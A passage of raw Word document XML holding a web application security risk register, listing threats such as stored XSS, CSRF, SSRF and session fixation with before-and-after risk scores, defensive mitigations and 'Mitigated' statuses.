              <w:t>3×3=9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1ABAB472" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Parameterised queries + input validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="07A9324A" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1×3=3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="00FAEF31" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Mitigated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="72A8F2B3" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="44EFCAA7" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>R2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="3E3E4EDF" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Stored XSS via bio field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7764918E" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>3×3=9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="6830FEE7" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Output encoding + CSP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="3AAFC9BF" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1×3=3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="04DB7876" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Mitigated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="42CEF878" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5673A0D5" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>R3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2CEDE31F" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CSRF on enrolment/profile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3D2EEAA3" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>2×2=4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4BEC48E7" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Per-session CSRF </w:t>
            </w:r>
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="42B5B004" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1×2=2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4F2E6B16" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Mitigated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="5DCED991" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="191EE664" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>R4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="51795927" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SSRF via link preview</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="375E0A4E" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>2×3=6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2DBE23B6" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Allowlist + IP re-check + no redirects</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="726CBAA1" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1×3=3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="5040B78F" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Mitigated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="3BA59657" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="637D69BD" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>R5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5D4E5E3C" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Broken access control — admin pages</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="22821730" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>2×3=6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="73C05BC9" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Server-side role re-check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="358E1592" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1×3=3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="26DE5D14" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Mitigated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="336FC1B2" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="5A856BC9" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>R6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="4B84D23D" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Credential stuffing / brute force</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="41824E4B" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>3×2=6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="3F026ECF" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Rate limiting +</w:t>
            </w:r>
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> lockout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="5B61D3B0" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1×2=2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="5302F4A2" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Mitigated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="06DAEA01" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="61669125" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>R7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="36DB1D39" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Session fixation / hijacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0EFCD2F3" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>2×3=6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="14357372" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Session regeneration + cookie flags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="619A949C" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1×3=3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0244075B" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Mitigated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="1C455019" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="174FE7D5" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>R8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="6F7D9B14" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Malicious file upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="40B32E83" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>2×3=6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="350C2A89" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Content-sniffed MIME check, random filenames</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2EC8A688" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1×3=3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="62A9844C" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Mitigated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="19B74E98" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2A1E858E" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
